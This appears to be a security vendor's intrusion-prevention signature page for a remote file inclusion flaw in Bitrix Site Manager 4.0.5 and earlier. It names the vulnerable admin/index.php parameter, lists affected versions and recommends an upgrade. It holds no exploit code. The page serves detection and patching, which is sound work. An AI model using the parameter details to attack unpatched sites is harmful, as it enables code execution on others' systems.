PHP.BITRIX.Site.Manager.Remote.File.Inclusion

description-logoDescription

It indicates a possible exploit of remote file include vulnerability in Bitrix Site Manage.


Bitrix Site Manager is a powerful Content Management Solution that enables to effectively create and manage web sites. A remote file include vulnerability is reported in it that may allow an attacker to execute arbitrary PHP code on the affected system. This is due to application failure to properly validate the _SERVER[DOCUMENT_ROOT] parameter passed to admin/index.php. For exploiting this, an attacker may send a specially-crafted URL to the admin/index.php script in the _SERVER[DOCUMENT_ROOT] parameter to include a malicious file from a remote system which would enable the attacker to execute arbitrary code on the vulnerable system.

affected-products-logoAffected Products

Bitrix Site Manager 4.0.5 and prior versions.

Impact logoImpact

Compromise of the affected system.

recomended-action-logoRecommended Actions

Upgrade to Bitrix Site Manager 4.0.9 or later versions.

Telemetry logoTelemetry

Coverage

IPS (Regular DB)
IPS (Extended DB)